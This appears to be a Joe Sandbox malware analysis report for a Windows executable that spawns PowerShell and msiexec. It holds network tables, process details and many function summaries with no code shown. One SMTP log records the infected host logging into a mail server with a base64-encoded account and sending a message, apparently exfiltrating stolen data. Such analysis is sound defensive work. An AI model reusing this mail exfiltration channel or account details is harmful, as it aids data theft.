---|---|---|---|
2024-11-05 15:10:22 UTC | 250 | OUT | |
2024-11-05 15:10:25 UTC | 4928 | IN | |
2024-11-05 15:10:25 UTC | 4928 | IN | |
2024-11-05 15:10:25 UTC | 4838 | IN | |
2024-11-05 15:10:25 UTC | 1326 | IN | |
2024-11-05 15:10:25 UTC | 1378 | IN | |
2024-11-05 15:10:25 UTC | 1378 | IN | |
2024-11-05 15:10:25 UTC | 1378 | IN | |
2024-11-05 15:10:25 UTC | 1378 | IN | |
2024-11-05 15:10:25 UTC | 1378 | IN | |
2024-11-05 15:10:25 UTC | 1378 | IN | |
2024-11-05 15:10:25 UTC | 1378 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.9 | 49913 | 172.67.74.152 | 443 | 764 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-05 15:10:26 UTC | 155 | OUT | |
2024-11-05 15:10:26 UTC | 399 | IN | |
2024-11-05 15:10:26 UTC | 14 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Nov 5, 2024 16:10:29.785978079 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 | 220 us2.outbound.mailhostbox.com ESMTP Postfix |
Nov 5, 2024 16:10:29.786206961 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 | EHLO 760639 |
Nov 5, 2024 16:10:29.941250086 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 | 250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING |
Nov 5, 2024 16:10:29.941703081 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 | AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t |
Nov 5, 2024 16:10:30.099355936 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 | 334 UGFzc3dvcmQ6 |
Nov 5, 2024 16:10:30.264606953 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 | 235 2.7.0 Authentication successful |
Nov 5, 2024 16:10:30.266959906 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 | MAIL FROM:<tech1@santonswitchgears.com> |
Nov 5, 2024 16:10:30.423809052 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 | 250 2.1.0 Ok |
Nov 5, 2024 16:10:30.424019098 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 | RCPT TO:<tech1@santonswitchgears.com> |
Nov 5, 2024 16:10:30.648905993 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 | 250 2.1.5 Ok |
Nov 5, 2024 16:10:30.651019096 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 | DATA |
Nov 5, 2024 16:10:30.807342052 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 | 354 End data with <CR><LF>.<CR><LF> |
Nov 5, 2024 16:10:30.808073997 CET | 49933 | 587 | 192.168.2.9 | 208.91.199.223 | . |
Nov 5, 2024 16:10:31.091789961 CET | 587 | 49933 | 208.91.199.223 | 192.168.2.9 | 250 2.0.0 Ok: queued as 7F7A2500232 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 10:09:48 |
Start date: | 05/11/2024 |
Path: | C:\Users\user\Desktop\ulf4JrCRk2.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 748'528 bytes |
MD5 hash: | A8A9F68888009BF9737238846F3B6EC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 10:09:49 |
Start date: | 05/11/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x10000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 10:09:49 |
Start date: | 05/11/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 10:10:09 |
Start date: | 05/11/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x870000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 23.3% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 23% |
Total number of Nodes: | 1257 |
Total number of Limit Nodes: | 34 |
Graph
Function 00403217 Relevance: 82.6, APIs: 28, Strings: 19, Instructions: 337stringfilecomCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040511A Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 280windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405D13 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004055B1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062CB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405FF5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403B19 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403787 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404FDC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040303A Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004054A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406700 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406901 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406617 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040611C Relevance: 5.2, APIs: 4, Instructions: 198COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040656A Relevance: 5.2, APIs: 4, Instructions: 180COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406688 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004065D4 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402F1F Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004050AE Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405982 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040595D Relevance: 3.0, APIs: 2, Instructions: 13COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403695 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401705 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004059FA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404038 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404021 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004031CC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040400E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404959 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040442A Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 264stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404135 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 205windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405A29 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404053 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004048A7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402B42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004047C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405781 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404F50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004057C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004058E7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456E3E0 Relevance: .7, Instructions: 716COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07444D68 Relevance: 3.6, Strings: 2, Instructions: 1098COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07444450 Relevance: 2.9, Strings: 2, Instructions: 373COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0744DB52 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07444433 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07444D4F Relevance: .9, Instructions: 888COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 074440A0 Relevance: .6, Instructions: 644COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0744D619 Relevance: .6, Instructions: 620COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 074437DC Relevance: .6, Instructions: 587COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04569A50 Relevance: .6, Instructions: 571COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0744CE28 Relevance: .5, Instructions: 503COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 074441B1 Relevance: .5, Instructions: 486COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07441477 Relevance: .4, Instructions: 395COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 045672A0 Relevance: .3, Instructions: 315COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 045695A8 Relevance: .3, Instructions: 298COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04562AA0 Relevance: .2, Instructions: 224COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04567A68 Relevance: .2, Instructions: 194COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04567BD6 Relevance: .2, Instructions: 188COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456B6D0 Relevance: .1, Instructions: 148COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 045677F9 Relevance: .1, Instructions: 124COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456F18C Relevance: .1, Instructions: 121COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07440AF0 Relevance: .1, Instructions: 120COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04567A53 Relevance: .1, Instructions: 120COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456B700 Relevance: .1, Instructions: 119COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04562BB0 Relevance: .1, Instructions: 113COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 074448F0 Relevance: .1, Instructions: 102COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07446184 Relevance: .1, Instructions: 98COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07440FD0 Relevance: .1, Instructions: 94COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07441100 Relevance: .1, Instructions: 94COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07440FB7 Relevance: .1, Instructions: 80COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 074410E7 Relevance: .1, Instructions: 77COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02C6F348 Relevance: .1, Instructions: 76COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456FE48 Relevance: .1, Instructions: 76COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04569D90 Relevance: .1, Instructions: 63COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04569597 Relevance: .1, Instructions: 59COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02C6F343 Relevance: .1, Instructions: 57COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07440DC0 Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07448151 Relevance: .0, Instructions: 47COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02C6D005 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02C6D01D Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456D590 Relevance: .0, Instructions: 44COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456F038 Relevance: .0, Instructions: 42COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456F048 Relevance: .0, Instructions: 39COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456F350 Relevance: .0, Instructions: 38COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456D5A0 Relevance: .0, Instructions: 37COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456F341 Relevance: .0, Instructions: 33COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456FCEA Relevance: .0, Instructions: 28COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456FCF8 Relevance: .0, Instructions: 24COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456FAB8 Relevance: .0, Instructions: 24COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456FEBF Relevance: .0, Instructions: 23COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07440036 Relevance: .0, Instructions: 21COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456FB82 Relevance: .0, Instructions: 19COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456FED0 Relevance: .0, Instructions: 16COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456FAC8 Relevance: .0, Instructions: 15COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0456FB90 Relevance: .0, Instructions: 15COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07441CB6 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02C6D6E0 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0744F605 Relevance: 5.3, Strings: 4, Instructions: 285COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07444AA8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 8.5% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 3.5% |
Total number of Nodes: | 86 |
Total number of Limit Nodes: | 17 |
Graph
Function 26AB59D8 Relevance: 4.0, Strings: 2, Instructions: 1472COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02E37EC0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26ABE828 Relevance: .8, Instructions: 772COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02E3F5C5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247libraryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02E37EB8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB66A0 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26ABF87D Relevance: .7, Instructions: 736COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB97F0 Relevance: .6, Instructions: 562COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26ABE2C0 Relevance: .4, Instructions: 389COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB9791 Relevance: .3, Instructions: 324COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB97E1 Relevance: .3, Instructions: 312COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26ABE818 Relevance: .3, Instructions: 294COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26ABC020 Relevance: .3, Instructions: 262COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26ABA310 Relevance: .3, Instructions: 257COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB93E8 Relevance: .2, Instructions: 229COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB74D8 Relevance: .2, Instructions: 222COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB77F8 Relevance: .2, Instructions: 221COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB74E8 Relevance: .2, Instructions: 218COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB7810 Relevance: .2, Instructions: 210COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB583D Relevance: .1, Instructions: 111COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB5700 Relevance: .1, Instructions: 111COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB5850 Relevance: .1, Instructions: 105COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB5710 Relevance: .1, Instructions: 91COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB70E0 Relevance: .1, Instructions: 80COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26AB70F0 Relevance: .1, Instructions: 78COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 26ABA300 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02E0D030 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02E0D005 Relevance: .1, Instructions: 69COMMON
Memory Dump Source |
|
